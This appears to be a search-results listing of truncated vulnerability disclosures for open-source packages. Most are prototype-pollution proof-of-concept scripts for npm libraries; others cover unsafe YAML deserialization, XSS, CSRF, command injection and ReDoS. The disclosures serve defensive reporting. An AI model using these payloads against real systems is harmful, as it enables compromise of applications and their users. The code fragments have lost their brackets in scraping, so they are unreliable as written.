4057 matches found
Code Injection in tensorflow/models
Description Arbitrary Code Excecution in Tensorflow/Models.The TensorFlow Model Garden is a repository with a number of different implementations of state-of-the-art SOTA models and modeling solutions for TensorFlow users. We aim to demonstrate the best practices for modeling so that TensorFlow...
Prototype Pollution in bonnevoyager/nested-objects-util
Description nested-objects-util is vulnerable to Prototype Pollution. Proof of Concept 1. Create the following PoC file: // poc.js var unflatten = require"nested-objects-util" console.log"Before : " + .polluted; unflatten"proto.polluted": "Yes! Its Polluted" console.log"After : " + .polluted; 2...
Code Injection in ultralytics/yolov5
Description Arbitrary Code Excecution in ultralytics/yolov5. Yolov5 is a Object Detection model from Ultralytics. Ultralytics is a U.S.-based particle physics and AI startup with over 6 years of expertise supporting government, academic and business clients. Ultralytics offer a wide range of visi...
Prototype Pollution in rodrigocmoreira/sgt-fields
Description sgt-fields is vulnerable to Prototype Pollution. Proof of Concept 1. Create the following PoC file: // poc.js var sgtFields = require"sgt-fields" var obj = console.log"Before : " + .polluted; sgtFields.setobj,"proto.polluted","Yes! Its Polluted"; console.log"After : " + .polluted; 2...
Code Injection in zqpei/deep_sort_pytorch
Description Arbitrary Code Excecution in deepsort built on pytorch. MOT tracking using deepsort and yolov3 with pytorch. Technical Description This package was vulnerable to Arbitrary code execution due to a use of a known vulnerable function load in yaml. All the scripts importing utils/parser.p...
Prototype Pollution in patrickleet/expand-keys
Description expand-keys is vulnerable to Prototype Pollution. Proof of Concept 1. Create the following PoC file: // poc.js var expandKeys = require"expand-keys" console.log"Before : " + .polluted; expandKeys"proto.polluted": "Yes! Its Polluted" console.log"After : " + .polluted; 2. Execute the...
Code Injection in mozilla/deepspeech
Description Arbitrary Code Excecution in mozilla/DeepSpeech.DeepSpeech is an open source embedded offline, on-device speech-to-text engine which can run in real time on devices ranging from a Raspberry Pi 4 to high power GPU servers. Technical Description This package was vulnerable to Arbitrary...
in nvidia/runx
Description runx is a Deep Learning Experiment Management library by NVIDIA. This package was vulnerable to Arbitrary code execution via Insecure YAML deserialization due to the use of a known vulnerable function load in yaml. repo: https://github.com/NVIDIA/runx Proof of Concept python...
Code Injection in microsoft/nni
Description Arbitrary Code Excecution in microsoft/nni. An open source AutoML toolkit for automate machine learning lifecycle, including feature engineering, neural architecture search, model compression and hyper-parameter tuning. Technical Description This package was vulnerable to Arbitrary co...
Code Injection in svaarala/duktape
Description Arbitrary Code Excecution in svaarala/duktape/tools/genconfig.py. Duktape - embeddable Javascript engine with a focus on portability and compact footprint. Genconfig is a Process Duktape option metadata and produce various useful outputs. Technical Description This package was...
Code Injection in microsoft/qlib
Description Arbitrary Code Excecution in microsoft/qlib. Qlib is an AI-oriented quantitative investment platform, which aims to realize the potential, empower the research, and create the value of AI technologies in quantitative investment. Technical Description This package was vulnerable to...
Code Injection in ultralytics/yolov3
Description Arbitrary Code Excecution in ultralytics/yolov3. Yolov3 is a model from Ultralytics. Ultralytics is a U.S.-based particle physics and AI startup with over 6 years of expertise supporting government, academic and business clients. Ultralytics offer a wide range of vision AI services,...
Prototype Pollution in badopcode/nodash
Description ts-nodash is vulnerable to Prototype Pollution. Proof of Concept 1. Create the following PoC file: // poc.js var merge = require"ts-nodash".Merge const payload = JSON.parse'"proto":"polluted":"Yes! Its Polluted"'; var obj = console.log"Before : " + .polluted; mergeobj, payload;...
Cross-site Scripting (XSS) - Generic in apexcharts/apexcharts.js
Description apexcharts is vulnerable to Cross-Site Scripting XSS. Proof of Concept 1. Install the package by following this instruction https://apexcharts.com/docs/installation/ or try the live sandbox here https://codepen.io/apexcharts/pen/xYqyYm 2. Edit JS and insert the XSS payload below in th...
Prototype Pollution in asaianudeep/deep-override
Description deep-override is vulnerable to Prototype Pollution. Proof of Concept 1. Create the following PoC file: // poc.js var deepOverride = require"deep-override" const payload = JSON.parse'"proto":"polluted":"Yes! Its Polluted"'; var obj = console.log"Before : " + .polluted; deepOverrideobj,...
Cross-site Scripting (XSS) - Generic in igniterealtime/openfire-bookmarks-plugin
Description openfire-bookmarks-plugin is vulnerable to Cross-Site Scripting XSS. Steps To Reproduce 1. Download openfire and install https://www.igniterealtime.org/downloads/ 2. Run the server http://localhost:9090/index.jsp 3. Click on "Plugins" http://localhost:9090/plugin-admin.jsp and install...
Cross-Site Request Forgery (CSRF) in strider-cd/strider
Description Strider is an Open Source Continuous Deployment / Continuous Integration platform. It is written in Node.js and Ember.js and uses MongoDB as a backing store. This platform is vulnerable to Cross-Site Request Forgery CSRF. It allowes an attacker to takeover accounts, privillege...
Prototype Pollution in ionicabizau/set-or-get.js
Description set-or-get is vulnerable to Prototype Pollution. Proof of Concept 1. Create the following PoC file: // poc.js var SetOrGet = require"set-or-get"; var obj = console.log"Before : " + .polluted; SetOrGetobj, "proto", .polluted ='Yes! Its Polluted'; console.log"After : " + .polluted; 2...
Prototype Pollution in ionicabizau/obj-unflatten
Description obj-unflatten convert flatten objects in nested ones. This package is vulnerable to Prototype Pollution. Proof of Concept 1. Create the following PoC file: javascript // poc.js const unflatten = require'obj-unflatten' console.log'Before: ' + .polluted unflatten'proto.polluted':...
Prototype Pollution in mout/mout
Description mout is vulnerable to Prototype Pollution. Proof of Concept 1. Create the following PoC file: // poc.js var mout = require"mout" var obj = console.log"Before : " + .polluted; mout.object.setobj,'proto.polluted','Yes! Its Polluted'; console.log"After : " + .polluted; 2. Execute the...
Prototype Pollution in steveukx/properties
Description properties-reader is vulnerable to Prototype Pollution. Proof of Concept 1. Create the following PoC and INI files: // poc.js var propertiesReader = require'properties-reader'; console.log"Before : " + .polluted console.log"Before : " + .polluted1 var properties =...
Prototype Pollution in evangelion1204/multi-ini
Description multi-ini is vulnerable to Prototype Pollution. Proof of Concept 1. Create the following PoC and INI files: // poc.js const ini = require'multi-ini'; console.log"Before : " + .polluted; var content = ini.read'./payload.ini'; console.log"After : " + .polluted; //payload.ini constructor...
Prototype Pollution in nodef/extra-object
Description extra-object is vulnerable to Prototype Pollution. This package allowing for modification of prototype behavior, which may result in Information Disclosure/DoS/RCE. Proof of Concept 1. Create the following PoC file: js // poc.js var extraObject = require"extra-object" var obj =...
Business Logic Errors in braitsch/node-login
Description node-login is a template for quickly building login systems on top of Node.js & MongoDB. The business logic which updates account details fails to verify if the provied email is associated with another account. Proof of Concept 1. Navigate to /signup and Create two accounts with data...
Cross-site Scripting (XSS) - Generic in thirtybees/thirtybees
Description Thirty bees is matured e-commerce solution which once started as a fork of PrestaShop 1.6.1.11 and is still compatible with almost all PS 1.6 modules. Its focus is on stability, correctness and reliability of the rich feature set, to allow merchants to focus on growing their business...
Cross-site Scripting (XSS) - Generic in s-cart/core
Description s-cart is a free e-commerce website project for businesses, built on the Laravel framework. this package is vulnerable to Stored Cross-Site Scripting XSS. https://github.com/s-cart/s-cart https://s-cart.org/about.html Steps To Reproduce-: 1 install https://github.com/s-cart/s-cart...
Code Injection in jadonk/bonescript
Overview BoneScript is a node.js library for physical computing on embedded Linux, starting with support for BeagleBone. Affected versions of this package are vulnerable to Command Injection. It is possible to inject arbitrary commands by using a semicolon char in the setDate function. Proof of...
Prototype Pollution in mozilla/node-convict
Description convict is vulnerable to Prototype Pollution. This package allowing for modification of prototype behavior, which may result in Information Disclosure/DoS/RCE. Proof of Concept 1. Create the following PoC file: js // poc.js var convict = require"convict"; var obj = ; var config =...
Prototype Pollution in b-heilman/bmoor
Description bmoor is vulnerable to Prototype Pollution. This package allowing for modification of prototype behavior, which may result in Information Disclosure/DoS/RCE. Proof of Concept 1. Create the following PoC file: js // poc.js const bmoor = require'bmoor'; var obj = console.log"Before : " ...
Prototype Pollution in maikelvl/dot-json
Description dot-json is vulnerable to Prototype Pollution. This package allowing for modification of prototype behavior, which may result in Information Disclosure/DoS/RCE. Proof of Concept 1. Create the following PoC file: js // poc.js var dotJson = require"dot-json" var myfile = new...
Cross-site Scripting (XSS) - Generic in frappe/charts
Description frappe-charts is vulnerable to Cross-Site Scripting XSS. Steps To Reproduce 1. Open NPM repo https://www.npmjs.com/package/frappe-charts 2. Open the Explore demos https://frappe.io/charts 3. At the bottom find the sandbox Ref:...
Prototype Pollution in imrefazekas/assign.js
Description assign.js is vulnerable to Prototype Pollution. This package allowing for modification of prototype behavior, which may result in Information Disclosure/DoS/RCE. Proof of Concept 1. Create the following PoC file: js // poc.js var Assigner = require"assign.js" var assigner = new Assign...
Prototype Pollution in okunishinishi/node-objnest
Description objnest is vulnerable to Prototype Pollution. This package allowing for modification of prototype behavior, which may result in Information Disclosure/DoS/RCE. Proof of Concept 1. Create the following PoC file: js // poc.js var objnest = require"objnest" console.log"Before : " +...
Prototype Pollution in generates/generates
Description @generates/merger is vulnerable to Prototype Pollution. This package allowing for modification of prototype behavior, which may result in Information Disclosure/DoS/RCE. Proof of Concept 1. Create the following PoC file: js // poc.js var merger = require"@generates/merger" const paylo...
Prototype Pollution in jquense/yup
Description yup is vulnerable to Prototype Pollution. This package allowing for modification of prototype behavior, which may result in Information Disclosure/DoS/RCE. Proof of Concept 1. Create the following PoC file: js // poc.js let yup = require'yup'; const payload =...
Prototype Pollution in coderaiser/nessy
Description nessy is vulnerable to Prototype Pollution. This package allowing for modification of prototype behavior, which may result in Information Disclosure/DoS/RCE. Proof of Concept 1. Create the following PoC file: js // poc.js var nessy = require"nessy" var obj = console.log"Before : " +...
Prototype Pollution in sonnyp/json8
Description json8-patch is vulnerable to Prototype Pollution. This package allowing for modification of prototype behavior, which may result in Information Disclosure/DoS/RCE. Proof of Concept 1. Create the following PoC file: js // poc.js var json8Patch = require"json8-patch" var obj = const pat...
Prototype Pollution in sonnyp/json8
Description json8-pointer is vulnerable to Prototype Pollution. This package allowing for modification of prototype behavior, which may result in Information Disclosure/DoS/RCE. Proof of Concept 1. Create the following PoC file: js // poc.js var json8Pointer = require"json8-pointer"...
Cross-site Scripting (XSS) - Generic in alibaba/bizcharts
Description bizcharts is vulnerable to Cross-Site Scripting XSS. Steps To Reproduce-: 1. Open NPM repo https://www.npmjs.com/package/bizcharts 2. Open the demo https://bizcharts.net/product/BizCharts4/gallery 3. Select any chartI used pie chart Ex: https://bizcharts.net/product/BizCharts4/demo/37...
in microweber/microweber
Description microweber/microweber is vulnerable to Arbitrary File Upload. Effective controls have not been implemented to restrict users from uploading malicious content to the web server. Files containing code like .php, .exe and etc can be uploaded successfully. Steps To Reproduce-: 1. Login in...
Denial of Service in locutusjs/locutus
Description locutus is vulnerable to ReDoS. The regular expression at src/php/network/inetpton.js:24 is vulnerable to ReDoS. It is possible to cause increasing slow-downs which lock the event loop by passing strings which have some number of repeating a characters followed by a . character. For...
Prototype Pollution in yargs/y18n
Description y18n is vulnerable to Prototype Pollution. This package allowing for modification of prototype behavior, which may result in Information Disclosure/DoS/RCE. Proof of Concept 1. Create the following PoC file: js // poc.js const y18n = require'y18n'; var obj = console.log"Before : " +...
Prototype Pollution in starcounter-jack/json-patch
Description fast-json-patch is vulnerable to Prototype Pollution. This package allowing for modification of prototype behavior, which may result in Information Disclosure/DoS/RCE. Proof of Concept 1. Create the following PoC file: js // poc.js let fastjsonpatch = require"fast-json-patch"; functio...
Prototype Pollution in sagold/gson-query
Description gson-query is vulnerable to Prototype Pollution. This package allowing for modification of prototype behavior, which may result in Information Disclosure/DoS/RCE. Proof of Concept 1. Create the following PoC file: js // poc.js var gsonQuery = require"gson-query" var obj =...
Cross-site Scripting (XSS) - Generic in dolibarr/dolibarr
Description The application is vulnerable to html injection in password reset functionality. PoC CLICK ME...
Prototype Pollution in yeikos/js.merge
Overview merge is used to merge multiple objects into one object. Affected versions of this package are vulnerable to Prototype Pollution via the merge.recursive function. It can be tricked into adding or modifying properties of the Object prototype. These properties will be present on all object...
in seleniumhq/selenium
Description Selenium is an umbrella project encapsulating a variety of tools and libraries enabling web browser automation. Selenium specifically provides infrastructure for the W3C WebDriver specification — a platform and language-neutral coding interface compatible with all major web browsers...
Prototype Pollution in liriliri/licia
Description licia package is vulnerable to prototype pollution issue files can be found in https://github.com/liriliri/licia/blob/master/src/e/extendDeep.js & https://github.com/liriliri/licia/blob/master/src/s/safeSet.jsL46 Proof of Concept 1. Creating poc filed js var utils = require'licia'; va...
Prototype Pollution in pierreinglebert/json-merge-patch
Description json-merge-patch is vulnerable to Prototype Pollution. This package fails to restrict access to prototypes of objects, allowing for modification of prototype behavior using a proto payload, which may result in Information Disclosure/DoS/RCE. Proof of Concept 1. Create the following Po...
Prototype Pollution in mariocasciaro/object-path
Overview object-path is a tiny JavaScript utility to access deep properties using a path for Node and the Browser Prototype Pollution refers to the ability to inject properties into existing JavaScript language construct prototypes, such as objects. JavaScript allows all Object attributes to be...